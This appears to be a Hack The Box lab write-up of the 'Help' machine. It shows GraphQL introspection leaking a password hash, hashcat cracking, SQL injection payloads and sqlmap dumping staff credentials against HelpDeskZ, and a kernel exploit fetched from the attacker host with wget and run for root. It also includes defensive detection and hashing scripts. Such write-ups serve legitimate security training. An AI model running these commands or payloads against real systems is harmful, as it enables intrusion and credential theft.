Home study notes

I write up what I have studied in IT and security.

【Hack The Box】help


Reconnaissance / Scanning

Scan with nmap.

The result of "nmap -p- 10.10.10.121" shows that several ports are open.

Based on that result, run nmap again against the open ports to investigate them further.

┌──(kali㉿kali)-[~/help]
└─$ sudo nmap -p22,80,3000 -sC -sV -A 10.10.10.121
[sudo] kali のパスワード:
Starting Nmap 7.94SVN ( https://nmap.org ) 
Nmap scan report for 10.10.10.121
Host is up (0.21s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   214.20 ms 10.10.14.1
2   215.11 ms 10.10.10.121

Now look at each port in more detail.

Investigating TCP/80

Opening it in a browser showed no page.

Browser access

dirb finds the following pages.

---- Scanning URL: http://help.htb/ ----
+ http://help.htb/index.html (CODE:200|SIZE:11321)
==> DIRECTORY: http://help.htb/javascript/
+ http://help.htb/server-status (CODE:403|SIZE:296)
==> DIRECTORY: http://help.htb/support/

Accessing /support shows the following screen.

/support

It appears credentials are required.

Investigating TCP/3000

Accessing it shows the following screen.

Accessing TCP/3000

According to the message, credentials can be obtained here.

This page uses GraphQL, and the schema can be retrieved with the following commands.

┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { queryType { name, fields { name, description } } } }" }' | jq -c .
{"data":{"__schema":{"queryType":{"name":"Query","fields":[{"name":"user","description":""}]}}}}

┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c .
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}

┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .
{
  "data": {
    "__type": {
      "name": "User",
      "fields": [
        {
          "name": "username"
        },
        {
          "name": "password"
        }
      ]
    }
  }
}

┌──(kali㉿kali)-[~/help]
└─$ curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq -c .
{"data":{"user":{"username":"helpme@helpme.com","password":"5d3c93182bb20f07b994a7f617e99cff"}}}

For some reason, the last query failed when I wrote "User" instead of "user".

The retrieved password appears to be an MD5 hash.
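The introspection queries above work because the endpoint answers `__schema` / `__type` queries to anyone. The script below is an added example (not from the original post) of the check a defender would run on such an endpoint: it parses an introspection response of the same shape as the output above (sample JSON constructed here) and flags fields whose names suggest credentials. The `fetch_schema` helper and the `SENSITIVE` pattern are my own assumptions.

```python
import json
import re
import urllib.request
from typing import List, Tuple

# One query that returns every type with its fields (the same information the
# three separate curl queries above retrieved piece by piece).
INTROSPECTION_QUERY = "{ __schema { types { name fields { name } } } }"

# Field names that should never be readable through an unauthenticated query.
SENSITIVE = re.compile(r"pass(word|wd)?|secret|token|hash|apikey|api_key", re.I)


def fetch_schema(url: str, timeout: float = 10.0) -> dict:
    """POST the introspection query to a GraphQL endpoint (network helper)."""
    body = json.dumps({"query": INTROSPECTION_QUERY}).encode()
    req = urllib.request.Request(url, data=body, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def find_sensitive_fields(response: dict) -> List[Tuple[str, str]]:
    """Return (type, field) pairs whose field name matches SENSITIVE.

    Built-in introspection types (names starting with "__") are skipped, and
    scalar types, which report fields as null, are tolerated.
    """
    hits = []
    schema = response.get("data", {}).get("__schema", {})
    for gql_type in schema.get("types", []):
        name = gql_type.get("name", "")
        if name.startswith("__"):
            continue
        for field in gql_type.get("fields") or []:
            if SENSITIVE.search(field.get("name", "")):
                hits.append((name, field["name"]))
    return hits


# Constructed sample shaped like the responses above: introspection is enabled
# and the User type exposes both username and password.
SAMPLE_RESPONSE = {"data": {"__schema": {"types": [
    {"name": "Query", "fields": [{"name": "user"}]},
    {"name": "User", "fields": [{"name": "username"}, {"name": "password"}]},
    {"name": "String", "fields": None},
    {"name": "__Schema", "fields": [{"name": "types"}]},
]}}}

if __name__ == "__main__":
    for type_name, field_name in find_sensitive_fields(SAMPLE_RESPONSE):
        print(f"sensitive field exposed via introspection: {type_name}.{field_name}")
```

Against a live endpoint, replace `SAMPLE_RESPONSE` with `fetch_schema("http://host:3000/graphql")`; an empty result with introspection still answering is the cue to disable introspection in production.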

┌──(kali㉿kali)-[~/help]
└─$ hashid 5d3c93182bb20f07b994a7f617e99cff                                     
Analyzing '5d3c93182bb20f07b994a7f617e99cff'
[+] MD2 
[+] MD5 
[+] MD4 
[+] Double MD5 
[+] LM 
[+] RIPEMD-128 
[+] Haval-128 
[+] Tiger-128 
[+] Skein-256(128) 
[+] Skein-512(128) 
[+] Lotus Notes/Domino 5 
[+] Skype 
[+] Snefru-128 
[+] NTLM 
[+] Domain Cached Credentials 
[+] Domain Cached Credentials 2 
[+] DNSSEC(NSEC3) 
[+] RAdmin v2.x 

Crack it with hashcat.

┌──(kali㉿kali)-[~/help]
└─$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt                 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-AMD Ryzen 3 3100 4-Core Processor, 3920/7904 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz             
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 5d3c93182bb20f07b994a7f617e99cff
Time.Started.....: Thu Jul 25 21:02:20 2024 (11 secs)
Time.Estimated...: Thu Jul 25 21:02:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   780.4 kH/s (0.23ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7839744/14344385 (54.65%)
Rejected.........: 0/7839744 (0.00%)
Restore.Point....: 7837696/14344385 (54.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: godilu1 -> gocubs2512
Hardware.Mon.#1..: Util: 56%

Gaining access

Going back to /support and entering these credentials, I was able to log in.

Screen after login

HelpDeskZ is an open-source help desk system with a known SQL injection vulnerability.

Version information


Exploit search results

Log in and create a ticket with an attachment.

Creating a ticket

The attachment link of the created ticket looks like the following; the SQLi vulnerability is in the last parameter.

http://10.10.10.121/support/?v=view_tickets&action=ticket&param=4&param=attachment&param=1&param=6

Appending "%20and%201=1--%20-" to the end of the URL confirms the vulnerability: with "1=1" the file downloads, while with "1=2" an error page is shown.

SQLi check (1)

SQLi check (2)

Use sqlmap to investigate the account information.
Copy the request from Burp into a file.

Output the list of tables.
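The boolean-based probe above (and the sqlmap payloads further down) leave a recognisable trace in the web server's access log. The script below is an added example, not part of the original post: it parses Apache combined-format log lines (constructed here to mirror the URLs used in this write-up), URL-decodes the `param[]` values and reports the ones carrying SQL fragments, which is what a defender would look for after the fact. The log format and the `PROBE_RE` pattern are my assumptions.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Apache combined log: '<ip> - - [<ts>] "<method> <path> <proto>" <status> ...'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Fragments that have no business inside a numeric ticket/attachment id.
PROBE_RE = re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+|--|sleep\s*\(|\bselect\b", re.I)


def parse_line(line: str) -> Optional[dict]:
    """Split one access-log line into fields plus its decoded query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # parse_qs percent-decodes, so "6%20and%201=1--%20-" becomes "6 and 1=1-- -"
    rec["query"] = parse_qs(urlsplit(rec["path"]).query)
    return rec


def suspicious_params(line: str) -> List[str]:
    """Return the decoded param[] / param values that look like SQLi probes."""
    rec = parse_line(line)
    if rec is None or rec["query"].get("v") != ["view_tickets"]:
        return []
    values = rec["query"].get("param[]", []) + rec["query"].get("param", [])
    return [v for v in values if PROBE_RE.search(v)]


# Constructed sample: a normal attachment download, the manual 1=1 check, and
# the time-based payload sqlmap reports below.
SAMPLE_LOG = [
    '10.10.14.3 - - [29/Jul/2024:05:40:01 +0000] "GET /support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6 HTTP/1.1" 200 5773 "-" "Mozilla/5.0"',
    '10.10.14.3 - - [29/Jul/2024:05:40:09 +0000] "GET /support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6%20and%201=1--%20- HTTP/1.1" 200 5773 "-" "Mozilla/5.0"',
    '10.10.14.3 - - [29/Jul/2024:05:41:30 +0000] "GET /support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6%20AND%20(SELECT%209605%20FROM%20(SELECT(SLEEP(5)))oNEB) HTTP/1.1" 200 312 "-" "sqlmap/1.8.6.3#dev"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hits = suspicious_params(line)
        if hits:
            print("possible SQLi probe from", parse_line(line)["ip"], "->", hits)
```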

┌──(kali㉿kali)-[~/htb/help]
└─$ sqlmap -r request -p param[] --tables 
        ___
       __H__                                                                                                                                                                                                  
 ___ ___[)]_____ ___ ___  {1.8.6.3#dev}                                                                                                                                                                       
|_ -| . [(]     | .'| . |                                                                                                                                                                                     
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[23:00:24] [INFO] parsing HTTP request from 'request'
[23:00:24] [INFO] resuming back-end DBMS 'mysql' 
[23:00:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: param[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6 AND 2767=2767

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6 AND (SELECT 9605 FROM (SELECT(SLEEP(5)))oNEB)
~(snip)~
Database: support
[19 tables]
+------------------------------------------------------+
| articles                                             |
| attachments                                          |
| canned_response                                      |
| custom_fields                                        |
| departments                                          |
| emails                                               |
| error_log                                            |
| file_types                                           |
| knowledgebase_category                               |
| login_attempt                                        |
| login_log                                            |
| news                                                 |
| pages                                                |
| priority                                             |
| settings                                             |
| staff                                                |
| tickets                                              |
| tickets_messages                                     |
| users                                                |
+------------------------------------------------------+

Next, dump the contents of the "staff" table.

┌──(kali㉿kali)-[~/htb/help]
└─$ sqlmap -r request -p param[] -D support -T staff --dump                   
        ___
       __H__                                                                                                                                                                                                  
 ___ ___[(]_____ ___ ___  {1.8.6.3#dev}                                                                                                                                                                       
|_ -| . [']     | .'| . |                                                                                                                                                                                     
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

~(snip)~

[20:35:58] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:36:03] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[20:36:03] [INFO] starting 4 processes 
[20:36:05] [INFO] cracked password 'Welcome1' for user 'admin'                                                                                                                                               
Database: support                                                                                                                                                                                            
Table: staff
[1 entry]
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| id | email              | login      | avatar | admin   | status   | fullname      | password                                            | timezone | username | signature                      | department         | last_login | newticket_notification |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| 1  | support@mysite.com | 1547216217 | NULL   | 1       | Enable   | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) |   | admin    | Best regards,\r\nAdministrator | a:1:{i:0;s:1:"1";} | 1543429746 | 0                      |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+

[20:36:16] [INFO] table 'support.staff' dumped to CSV file '/home/kali/.local/share/sqlmap/output/help.htb/dump/support/staff.csv'
[20:36:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'

This yielded the password. Logging in over SSH with it succeeded.

Access obtained
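Both passwords in this write-up fell to a wordlist because they were stored as fast, unsalted digests (MD5 from the GraphQL user object, SHA-1 from the HelpDeskZ staff table). The block below is an added example, not from the original post: it reproduces the check on the two digests recovered above with a constructed stand-in for rockyou.txt, then shows the salted, iterated PBKDF2 storage that would have made the same wordlist useless. The helper names and the round count are my own choices.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Digests recovered above: unsalted MD5 from the GraphQL user object and
# unsalted SHA-1 from the HelpDeskZ staff table (sqlmap's sha1_generic_passwd).
GRAPHQL_MD5 = "5d3c93182bb20f07b994a7f617e99cff"
STAFF_SHA1 = "d318f44739dced66793b1a603028133a76ae680e"

# Constructed stand-in for rockyou.txt.
WORDLIST = ["123456", "password", "Welcome1", "godhelpmeplz", "letmein"]


def wordlist_match(digest_hex: str, algo: str, words: Iterable[str]) -> Optional[str]:
    """Return the word whose unsalted digest equals digest_hex, or None.

    One cheap hash call per candidate is all a fast unsalted digest costs;
    hashcat above went through 7.8 million rockyou entries in 11 seconds.
    """
    for w in words:
        if hashlib.new(algo, w.encode()).hexdigest() == digest_hex:
            return w
    return None


# The alternative: a salted, iterated KDF. Each guess now costs PBKDF2_ROUNDS
# SHA-256 rounds, and the per-user salt defeats precomputed tables.
PBKDF2_ROUNDS = 600_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return "pbkdf2_sha256$<rounds>$<salt hex>$<dk hex>" for storage."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time."""
    _, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("MD5  ->", wordlist_match(GRAPHQL_MD5, "md5", WORDLIST))
    print("SHA1 ->", wordlist_match(STAFF_SHA1, "sha1", WORDLIST))
    stored = hash_password("Welcome1")
    print("pbkdf2 verify:", verify_password("Welcome1", stored))
```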

Privilege escalation

Searching for the Ubuntu kernel version turns up the following exploit.

Kernel version

www.exploit-db.com

Fetching the exploit above from Kali onto help and running it gives a root shell.

help@help:~$ wget http://10.10.14.3/44298.c
--2024-07-29 05:42:37--  http://10.10.14.3/44298.c
Connecting to 10.10.14.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5773 (5.6K) [text/x-csrc]
Saving to: ‘44298.c’

44298.c                                             100%[=================================================================================================================>]   5.64K  8.35KB/s    in 0.7s    

2024-07-29 05:42:38 (8.35 KB/s) - ‘44298.c’ saved [5773/5773]

help@help:~$ gcc -o a 44298.c
help@help:~$ ./a
task_struct = ffff88003b953800
uidptr = ffff88003712b544
spawning root shell
root@help:~#